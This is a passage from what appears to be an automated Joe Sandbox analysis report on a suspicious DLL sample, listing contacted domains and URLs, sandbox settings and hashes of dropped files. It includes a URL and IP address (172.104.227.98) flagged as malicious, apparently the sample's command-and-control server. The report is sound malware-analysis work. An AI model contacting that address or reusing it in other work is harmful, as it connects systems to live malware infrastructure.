https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F2b0a39109a3b849d0b2174b409fe1c7f.jpg	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
contextual.media.net	23.211.6.95	true	false	high
dart.l.doubleclick.net	142.250.203.102	true	false	high
tls13.taboola.map.fastly.net	151.101.1.44	true	false	high
hblg.media.net	23.211.6.95	true	false	high
lg3.media.net	23.211.6.95	true	false	high
btloader.com	104.26.7.139	true	false	high
ad-delivery.net	104.26.3.70	true	false	high
assets.msn.com	unknown	unknown	false	high
www.msn.com	unknown	unknown	false	high
ad.doubleclick.net	unknown	unknown	false	high
srtb.msn.com	unknown	unknown	false	high
img.img-taboola.com	unknown	unknown	false	high
cvision.media.net	unknown	unknown	false	high
browser.events.data.msn.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://btloader.com/tag?o=6208086025961472&upapi=true	false	URL Reputation: safe	unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fd3afd4e88e658af134b18abda7a3ae2a.jpg	false	Avira URL Cloud: safe	unknown
https://172.104.227.98/fcNtqWRYEAvIh	true	Avira URL Cloud: safe	unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2Fimages%2Fb21b558d-9496-4eb0-b10c-21d698be8cbf_1000x600.jpeg	false	Avira URL Cloud: safe	unknown
https://ad.doubleclick.net/favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250	false		high
https://ad-delivery.net/px.gif?ch=1&e=0.038705726061928736	false	Avira URL Cloud: safe	unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F2b0a39109a3b849d0b2174b409fe1c7f.jpg	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://assets.msn.com/staticsb/statics/latest/oneTrust/1.2/consent/55a804ab-e5c6-4b97-9319-86263d36	55a804ab-e5c6-4b97-9319-86263d365d28[2].json.6.dr	false		high
http://searchads.msn.net/.cfm?&&kp=1&	{EDD38173-5414-11EC-90E5-ECF4BB570DC9}.dat.4.dr, ~DFA7B565ABAC8E893D.TMP.4.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/nachrichten/coronareisen	de-ch[1].htm.6.dr	false		high
https://t0.tiles.ditu.live.com/tiles/gen19	svchost.exe, 0000000C.00000002.313275180.000002650A643000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.312008347.000002650A642000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.310976949.000002650A641000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 0000000C.00000002.313239402.000002650A63C000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/	svchost.exe, 0000000C.00000002.313433897.000002650A65D000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.310609771.000002650A65B000.00000004.00000001.sdmp	false		high
https://www.msn.com/de-ch/news/other/z%c3%bcrich-zahlt-f%c3%bcr-gr%c3%bcne-hausw%c3%a4nde/ar-AARnq3Z	de-ch[1].htm.6.dr	false		high
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_promotionalstripe_na	de-ch[1].htm.6.dr	false		high
https://onedrive.live.com;Fotos	52-478955-68ddb2ab[1].js.6.dr	false	Avira URL Cloud: safe	low
https://www.msn.com/de-ch/sport?ocid=StripeOCID	de-ch[1].htm.6.dr	false		high
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 0000000C.00000003.310543412.000002650A662000.00000004.00000001.sdmp	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn	de-ch[1].htm.6.dr	false		high
https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel	52-478955-68ddb2ab[1].js.6.dr	false		high
http://ogp.me/ns/fb#	de-ch[1].htm.6.dr	false		high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 0000000C.00000003.310609771.000002650A65B000.00000004.00000001.sdmp	false		high
https://www.botman.ninja/privacy-policy	iab2Data[2].json.6.dr	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 0000000C.00000002.313275180.000002650A643000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.312008347.000002650A642000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.310976949.000002650A641000.00000004.00000001.sdmp	false		high
https://outlook.live.com/mail/deeplink/compose;Kalender	52-478955-68ddb2ab[1].js.6.dr	false		high
https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg	{EDD38173-5414-11EC-90E5-ECF4BB570DC9}.dat.4.dr, ~DFA7B565ABAC8E893D.TMP.4.dr	false		high
https://www.msn.com/de-ch/news/other/traurig-und-primitiv-rettungswagen-w%c3%a4hrend-einsatz-verspra	de-ch[1].htm.6.dr	false		high
https://www.queryclick.com/privacy-policy	iab2Data[2].json.6.dr	false	Avira URL Cloud: safe	unknown
https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002	de-ch[1].htm.6.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn	52-478955-68ddb2ab[1].js.6.dr	false		high
https://www.msn.com/de-ch/news/other/wird-etwas-enger-im-bus-werden-die-kapazit%c3%a4t-aber-stemmen-	de-ch[1].htm.6.dr	false		high
http://www.reddit.com/	msapplication.xml4.4.dr	false		high
https://www.skype.com/	de-ch[1].htm.6.dr	false		high
http://www.bingmapsportal.com	svchost.exe, 0000000C.00000002.313031457.000002650A613000.00000004.00000001.sdmp	false		high
https://sp.booking.com/index.html?aid=1589774&label=travelnavlink	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/nachrichten/regional	de-ch[1].htm.6.dr	false		high
https://www.stroeer.de/werben-mit-stroeer/onlinewerbung/programmatic-data/sdi-datenschutz-b2c	iab2Data[2].json.6.dr	false	Avira URL Cloud: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 0000000C.00000003.311983863.000002650A657000.00000004.00000001.sdmp	false		high
https://onedrive.live.com/?qt=allmyphotos;Aktuelle	52-478955-68ddb2ab[1].js.6.dr	false		high
https://www.msn.com/de-ch/news/other/die-provisorische-kantonsschule-auf-dem-irchel-kann-2024-starte	de-ch[1].htm.6.dr	false		high
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 0000000C.00000002.313239402.000002650A63C000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.	svchost.exe, 00000008.00000003.608975714.0000022449AB0000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.609831427.0000022449AB0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://amzn.to/2TTxhNg	de-ch[1].htm.6.dr	false		high
https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com	52-478955-68ddb2ab[1].js.6.dr	false		high
https://client-s.gateway.messenger.live.com	52-478955-68ddb2ab[1].js.6.dr	false		high
https://secure.adnxs.com/clktrb?id=764680&t=1	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/	de-ch[1].htm.6.dr	false		high
https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site	52-478955-68ddb2ab[1].js.6.dr	false		high
http://crl.ver)	svchost.exe, 00000008.00000002.610070711.000002244F010000.00000004.00000001.sdmp, svchost.exe, 00000027.00000002.584221057.000001E8CC0E5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://www.msn.com/de-ch/news/other/lage-dramatisch-zugespitzt-%c3%b6v-in-winterthur-wird-teilweise	de-ch[1].htm.6.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	{EDD38173-5414-11EC-90E5-ECF4BB570DC9}.dat.4.dr, ~DFA7B565ABAC8E893D.TMP.4.dr	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 0000000C.00000002.313031457.000002650A613000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.313239402.000002650A63C000.00000004.00000001.sdmp	false		high
https://www.msn.com/de-ch	de-ch[1].htm.6.dr	false		high
https://%s.xboxlive.com	svchost.exe, 0000000A.00000002.776359886.0000025575440000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://dev.virtualearth.net/REST/v1/Locations	svchost.exe, 0000000C.00000003.310543412.000002650A662000.00000004.00000001.sdmp	false		high
https://www.tippsundtricks.co/gesundheit/stueck-seife-bettwasche/?utm_campaign=DECH-bedsoap&utm_	de-ch[1].htm.6.dr	false		high
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m	de-ch[1].htm.6.dr	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000C.00000003.288500837.000002650A630000.00000004.00000001.sdmp	false		high
https://twitter.com/i/notifications;Ich	52-478955-68ddb2ab[1].js.6.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http	de-ch[1].htm.6.dr	false		high
https://nextmillennium.io/privacy-policy/	iab2Data[2].json.6.dr	false		high
https://silvermob.com/privacy	iab2Data[2].json.6.dr	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 0000000C.00000002.313433897.000002650A65D000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.310609771.000002650A65B000.00000004.00000001.sdmp	false		high
https://browser.events.data.msn.com/OneCollector/1.0/t.js?qsp=true&anoncknm=%22%22&name=%22MS.News.W	de-ch[1].htm.6.dr	false		high
https://clkde.tradedoubler.com/click?p=273363&a=3064090&g=24940322	de-ch[1].htm.6.dr	false		high
https://dynamic.t	svchost.exe, 0000000C.00000003.310976949.000002650A641000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin	52-478955-68ddb2ab[1].js.6.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb	de-ch[1].htm.6.dr	false		high
http://www.youtube.com/	msapplication.xml7.4.dr	false		high
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 0000000C.00000003.310543412.000002650A662000.00000004.00000001.sdmp	false		high
http://ogp.me/ns#	de-ch[1].htm.6.dr	false		high
https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 0000000C.00000002.313239402.000002650A63C000.00000004.00000001.sdmp	false		high
https://www.tiktok.com/legal/report/	svchost.exe, 00000027.00000003.562574198.000001E8CC986000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.linkedin.com:443/news/story/gibt-es-einen-impfstoffmangel-5630362/?li=BBqfZdV	de-ch[1].htm.6.dr	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 0000000C.00000002.313433897.000002650A65D000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.310609771.000002650A65B000.00000004.00000001.sdmp	false		high
https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer	de-ch[1].htm.6.dr	false		high
https://msasg.visualstudio.com/Shared%20Data/_git/1DS.JavaScript?version=GBnubenja%2Fcustom-package	52-478955-68ddb2ab[1].js.6.dr	false		high
https://onedrive.live.com/?qt=mru;OneDrive-App	52-478955-68ddb2ab[1].js.6.dr	false		high
https://www.skype.com/de	52-478955-68ddb2ab[1].js.6.dr	false		high
https://www.tippsundtricks.co/lifehacks/schwamm-kuhlschrank/?utm_campaign=DECH-schwamm&utm_sourc	de-ch[1].htm.6.dr	false		high
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 0000000C.00000002.313433897.000002650A65D000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.310609771.000002650A65B000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 0000000C.00000003.310609771.000002650A65B000.00000004.00000001.sdmp	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me	de-ch[1].htm.6.dr	false		high
https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?"	de-ch[1].htm.6.dr	false	URL Reputation: safe	unknown
https://www.skype.com/de/download-skype	52-478955-68ddb2ab[1].js.6.dr	false		high
http://schemas.m	svchost.exe, 00000008.00000003.608975714.0000022449AB0000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.609831427.0000022449AB0000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header	de-ch[1].htm.6.dr	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 0000000C.00000003.310543412.000002650A662000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 0000000C.00000002.313239402.000002650A63C000.00000004.00000001.sdmp	false		high
http://www.hotmail.msn.com/pii/ReadOutlookEmail/	52-478955-68ddb2ab[1].js.6.dr	false		high
https://onedrive.live.com;OneDrive-App	52-478955-68ddb2ab[1].js.6.dr	false	Avira URL Cloud: safe	low
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/news/other/erste-best%c3%a4tigte-ansteckung-zwei-weitere-verdachtsf%c3%a4l	de-ch[1].htm.6.dr	false		high
https://clkde.tradedoubler.com/click?p=295926&a=3064090&g=24886692	de-ch[1].htm.6.dr	false		high
https://www.google.com/chrome/static/images/favicons/favicon-16x16.png	imagestore.dat.6.dr	false		high
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location	55a804ab-e5c6-4b97-9319-86263d365d28[2].json.6.dr	false		high
http://www.amazon.com/	msapplication.xml.4.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1	52-478955-68ddb2ab[1].js.6.dr	false		high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 0000000C.00000002.313275180.000002650A643000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.312008347.000002650A642000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.310976949.000002650A641000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.3.70	ad-delivery.net	United States	13335	CLOUDFLARENETUS	false
172.104.227.98	unknown	United States	63949	LINODE-APLinodeLLCUS	true
142.250.203.102	dart.l.doubleclick.net	United States	15169	GOOGLEUS	false
151.101.1.44	tls13.taboola.map.fastly.net	United States	54113	FASTLYUS	false
104.26.7.139	btloader.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	533066
Start date:	03.12.2021
Start time:	00:41:17
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 16m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Bccw1xUJah (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.evad.winDLL@49/135@12/7
EGA Information:	Failed
HDC Information:	Successful, ratio: 19.1% (good quality ratio 18%) Quality average: 73.3% Quality standard deviation: 27.8%
HCA Information:	Successful, ratio: 55% Number of executed functions: 56 Number of non-executed functions: 179
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 23.203.70.208, 204.79.197.203, 80.67.82.240, 80.67.82.209, 20.42.73.25, 23.211.4.86, 23.211.6.95, 80.67.82.50, 80.67.82.67, 80.67.82.11, 152.199.19.161, 20.54.110.249 Excluded domains from analysis (whitelisted): fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, onedscolprdeus06.eastus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ie9comview.vo.msecnd.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, a-0003.a-msedge.net, cvision.media.net.edgekey.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, www-msn-com.a-0003.a-msedge.net, a1999.dscg2.akamai.net, e607.d.akamaiedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, global.asimov.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:42:26	API Interceptor	10x Sleep call for process: svchost.exe modified
00:43:42	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.3593198815979092
Encrypted:	false
SSDEEP:	12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
MD5:	BF1DC7D5D8DAD7478F426DF8B3F8BAA6
SHA1:	C6B0BDE788F553F865D65F773D8F6A3546887E42
SHA-256:	BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
SHA-512:	00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
Malicious:	false
Reputation:	unknown
Preview:	.......................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	MPEG-4 LOAS
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.24939065713616343
Encrypted:	false
SSDEEP:	1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4i9yqy:BJiRdwfu2SRU4i9yqy
MD5:	368425E204C78A22F074C451D05FA44B
SHA1:	CF06DFDD501913EC12BCB708F80075189F4C09A6
SHA-256:	79698B4C36F784D96D10B6CFB6338F94FA3ADA462C1EC7AADA1BB089D2D2AA23
SHA-512:	A18FB462BCA5727B4E472C00648477E2B629D4B1FDABEC2E998AE886FEA60B547F34C6D91B96080D0CC66F0228FBDB8A35DB58EAF80FC50DE063925CC2F100F0
Malicious:	false
Reputation:	unknown
Preview:	V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xfff46d35, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	786432
Entropy (8bit):	0.2506370316752975
Encrypted:	false
SSDEEP:	384:2vn+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:2vMSB2nSB2RSjlK/+mLesOj1J2
MD5:	D55C2B5293610177685048F5C8A6CED8
SHA1:	5758E6F3B67B05301C75EC70E3D13AEB9C4DC014
SHA-256:	09EAE310CB8C0AA4091FAEEB1A186D1C92B492CF63CE9B0AF92AD210B7A0F9AD
SHA-512:	42450EADE660AE839448B06319ABC2C38D0B935939E22E4005200C6FD754A6D796ED6FC0C0DD9F81B108978639EDAA4231D8C1EB80E6DB596A6E8BA5C7D81E5D
Malicious:	false
Reputation:	unknown
Preview:	..m5... ................e.f.3...w........................).....%-...y...*...y..h.(.....%-...y....)..............3...w...........................................................................................................B...........@...................................................................................................... ......................................................................................................................................................................................................................................................:%-...y..................u.?.%-...y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.0765848412368083
Encrypted:	false
SSDEEP:	3:kTm/lR7v+PUyQOpciXrteTyVKjZIaYQeTXqll3Vkttlmlnl:kTmDr+MZOrzYj23C3
MD5:	AA16117B3C1EB78AECA757D25EFCD2FB
SHA1:	68FB699213DC09DE6BA9372610BD9C25A57DDED1
SHA-256:	FD543570112206EC902E28DA64EA15E1BBBD7642B31FE91EE3A68DEC5702E82A
SHA-512:	6824D607EFEB836F8248B2A1D73A79CC6FFFA2DC8FAF1EB00EAE39CC2BF665ABA3AD8283975EA2ACAE3A0445F6181C9F7BD743003B5E1835845C774156946C3A
Malicious:	false
Reputation:	unknown
Preview:	..'......................................3...w...*...y..%-...y..........%-...y..%-...y..] .q%-...y..................u.?.%-...y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_747b3d3843a661accc8c92924ccfd5a2e2d128_d70d8aa6_1589011f\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6246208873428793
Encrypted:	false
SSDEEP:	96:aowMqgUOZqyFy9hkoyt7JfqpXIQcQ5c6A2cE2cw33+a+z+HbHg2ZAXGng5FMTPSm:nw4UEB0HnM28jjo/u7spS274ItWD
MD5:	931A2BA15449F4257942DB1D9B44CE26
SHA1:	D02F1D7C6E74D650887AEA1096E9B770F2296DAE
SHA-256:	C53CDD7346906EA013101279ACC6E6DA6E11F19160C7BB4F820B97381D443B06
SHA-512:	2666A25CAE1872F988964FA1DC2C43D130636AB471AFEDCA416B1614BE33669213EEF23DC986FB528317BDD131878C640E8B149DBEB89009BA7392E51E9E3981
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.9.9.4.5.8.3.0.7.7.9.8.3.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.f.f.a.8.d.c.-.a.8.2.6.-.4.b.d.8.-.a.9.6.2.-.a.1.8.6.a.f.2.5.6.b.a.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.8.d.9.8.4.9.b.-.2.f.4.6.-.4.4.7.5.-.8.5.b.7.-.3.4.8.a.d.a.5.6.8.5.f.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.9.c.-.0.0.0.1.-.0.0.1.6.-.b.1.b.6.-.0.e.a.f.2.1.e.8.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.9././.2.8.:.1.1.:.5.3.:.0.5.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER180D.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	53068
Entropy (8bit):	3.0639197656320203
Encrypted:	false
SSDEEP:	768:YDHN4xEDNp7N22lkonqb5SMpQ0U+L7vcdFf/+EjmDgihTf:YDH6sNp7N22uv9SMpzLrcdV/+Scd
MD5:	D9C7CCBE5042F2733B5C5F252804881C
SHA1:	76B473834A3CC78A48F698E1A65347E698352405
SHA-256:	04296930B309AE53F98DEAD531DEC7E8BEC871E6358C0A8DCE000062C03CA917
SHA-512:	0771949D9D5786B3ACF8E6B1A4EB6839FCED13CED59EC5193847DD5B0F5856898092ED685C212868D822934D0C992C2ACB985BCE4326EEC45AE3E71BF895B7CB
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T